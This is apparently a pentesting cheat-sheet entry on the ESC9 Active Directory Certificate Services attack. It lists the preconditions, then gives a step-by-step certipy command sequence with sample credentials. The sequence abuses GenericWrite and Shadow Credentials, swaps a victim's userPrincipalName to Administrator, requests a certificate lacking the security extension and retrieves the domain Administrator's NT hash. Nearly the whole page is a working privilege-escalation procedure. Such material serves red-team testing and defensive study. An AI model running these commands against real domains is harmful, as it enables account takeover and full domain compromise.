Active Directory - Certificate ESC9
ESC9 - No Security Extension
Requirements
StrongCertificateBindingEnforcementset to1(default) or0- Certificate contains the
CT_FLAG_NO_SECURITY_EXTENSIONflag in themsPKI-Enrollment-Flagvalue - Certificate specifies
Any Clientauthentication EKU GenericWriteover any account A to compromise any account B
Scenario
John@corp.local has GenericWrite over Jane@corp.local, and we want to compromise Administrator@corp.local.
Jane@corp.local is allowed to enroll in the certificate template ESC9 that specifies the CT_FLAG_NO_SECURITY_EXTENSION flag in the msPKI-Enrollment-Flag value.
-
Obtain the hash of Jane with Shadow Credentials (using our GenericWrite)
certipy shadow auto -username John@corp.local -p Passw0rd -account Jane -
Change the userPrincipalName of Jane to be Administrator. :warning: leave the
@corp.localpartcertipy account update -username John@corp.local -password Passw0rd -user Jane -upn Administrator -
Request the vulnerable certificate template ESC9 from Jane's account.
certipy req -username jane@corp.local -hashes ... -ca corp-DC-CA -template ESC9 # userPrincipalName in the certificate is Administrator # the issued certificate contains no "object SID" -
Restore userPrincipalName of Jane to Jane@corp.local.
certipy account update -username John@corp.local -password Passw0rd -user Jane@corp.local -
Authenticate with the certificate and receive the NT hash of the Administrator@corp.local user.
certipy auth -pfx administrator.pfx -domain corp.local # Add -domain <domain> to your command line since there is no domain specified in the certificate.